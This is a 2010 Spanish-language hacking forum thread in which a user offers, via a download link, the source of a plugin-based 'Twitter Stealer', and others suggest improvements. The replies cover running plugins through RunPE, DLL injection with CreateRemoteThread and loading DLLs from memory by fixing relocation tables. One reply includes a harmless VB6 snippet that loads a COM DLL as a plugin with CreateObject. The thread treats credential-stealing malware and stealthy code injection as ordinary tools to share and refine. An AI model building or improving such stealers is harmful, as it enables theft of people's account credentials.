[SRC] Twitter Stealer

Iniciado por F3B14N, 13 Julio 2010, 19:26 PM

0 Miembros y 2 Visitantes están viendo este tema.

F3B14N

Buenas! :D Hice esto hace mucho y lo deje por ahi, como no sirve para nada guardado en mi HD, lo publico, quizas le dé mejor utilidad alguno de ustedes =).




Como podran ver es a base de plugins, no hice ningun funcional, pero está el plugin de ejemplo, asi ven la forma en que hay q entregar los datos para que el cliente ordene todo correctamente =)

El codigo es bastante simple de entender, espero que les sirva de algo y bueno nada mas que decir, Salu2! ;)

http://www.box.net/shared/o2cod7gqjf

Karcrack

#1
Muy completo ;)
Ahora falta ver como ejecuta plugins :rolleyes: :P
Mod:
He estado mirando por encima el codigo... y la verdad lo de los plugins no me gusta nada :-\ Eso de que para almacenar el resultado tenga que crear un fichero y que se carguen con un RunPe :-X... mucho mejor por ejemplo que los plugins fueran .DLL y que metieran la info en un Pipe o devolviesen el puntero al llamar al Main...

Saludos :D

F3B14N

#2
jaja si se puede mejorar mucho la parte de plugins, si hago v2 de esto :rolleyes: incluire el sistema de plugins del rat que creo que nunca terminare x falta de ganas :P

Lo de las DLL en VB6 no me gusta mucho por el momento, por el simple echo de la forma que son ejecutadas luego de ser inyectadas... Amaría ver un Code en VB6 que llame al DllSubMain de una libreria mediante un CallWindowProcW Remoto :P ... Pero no lo logre hacer y no veo SRC en la net como llamar un API en un proceso remoto pasandole 2 o + parametros usando CreateRemoteThread... Encontre lo mismo en c/c++ pero soy tan noobie que no logro VB6izarlo  ::) :-(

http://www.rohitab.com/discuss/index.php?showtopic=31453

Estaria muy bueno que alguien lograra escribirlo en VB6 y que lo comparta  :-X

Salu2  :D

Karcrack

Con hacer LoadLibrary a la DLL seria suficiente :P
Pero si no quieres dejarlas en el disco duro (las DLLs) tendrias que jugar con la Relocation Table como nos enseño nuestro querido amigo H0 :P

F3B14N

Cita de: Karcrack en 15 Julio 2010, 14:33 PM
Con hacer LoadLibrary a la DLL seria suficiente :P
Pero si no quieres dejarlas en el disco duro (las DLLs) tendrias que jugar con la Relocation Table como nos enseño nuestro querido amigo H0 :P

Estamos hablando de DLLs echas en VB6? Segun recuerdo de la ultima vez que intente crear una DLL en VB6 y se pueda cargar normalmente como se haria con cualquier DLL en C, etc... creo que el problema era que habia que cambiar su EntryPoint por el puntero de DllSubMain, pero al hacer eso se evadia el cargado de la MSVBVM60  :P

pd: si lo lograste hacer sin code que la ejecute, me seria muy util un ejemplo de ello  :P

Karcrack

DLLs estandar en VB6?
http://foro.elhacker.net/programacion_vb/solucionado_iquestque_es_vbadvance-t220089.0.html;msg1043501
http://foro.elhacker.net/programacion_visual_basic/inyeccion_dll-t218465.0.html

BlackZeroX

Con:

createObject()

Puedes hacer lo de los plugins!¡, también hay un modulo para crear un objeto y manipular las funciones del mismo (DLL) en PSC.

Dulces Lunas!¡.
The Dark Shadow is my passion.

BlackZeroX

#7
Mira aquí hay un ejemplo de un DLL que puede tratarse como Plugin, ya que l forma de hacer por comunicacion de archivos de texto no va de muy grata forma xP:

http://infrangelux.sytes.net/filex/?file=/BlackZeroX/Proyectos/Proyecto%20InfraExplorer/SRC_ExamplePlugin.rar&modo=2&dir=/BlackZeroX/Proyectos/Proyecto%20InfraExplorer&;

Lo que debes saber para tratar una DLL como plugin es que:

Nombre del proyecto = que el Nombre de la DLL ( si tu proyecto se llama Proyect1 tu DLL debera llamarse Proyect1.dll)
El nombre de los módulos de clase da igual, pero estos son usados para crear el Objeto con CreateObject()!¡.
Deben estar registrados con RegServ32

compila y con este código puedes correr un proceso X

El Siguiente código esta Orientado en el source qué te puse arriba ok!¡.

Código (vb) [Seleccionar]


'   by BlackZeroX.
'   Antes debes generar el Plugin "PluginExplicit" y registrarlo con RegServ32 (Solo en equipos donde NO SE COMPILO!¡.)

Dim ObjPlugin as Object
set ObjPlugin = createobject("PluginExplicit.cMain") ' // cMain es el nombre del Modulo de Clase!¡.
with ObjPlugin
   call .WSConnect ' // ejecuta el proceso deseado
   msgbox .Nombre
   msgbox .Version
   msgbox .ProcesoUno("") ' // proceso con parámetros en este caso e sun ParamArray xP
   msgbox .ProcesoDos("","","") ' // proceso con parámetros en este caso e sun ParamArray xP
   msgbox .ProcesoTres("","","") ' // proceso con parámetros en este caso e sun ParamArray xP
   CMain=nothing  ' // le puedes espesificar un Objeto para que el plugin trabaje con este!¡.
end with
set ObjPlugin = nothing ' // hay que descargarlo cuando ya no este en uso si no la memoria uff xS



la alternativa a CreateObject es CreateFromFile esta en PSC el modulo, y se trata de la misma manera, y hasta donde recuerdo este ultimo no nesesita que la DLL o plugin este registrado con RegServ32!¡.

Sangriento Infierno Lunar!¡.
The Dark Shadow is my passion.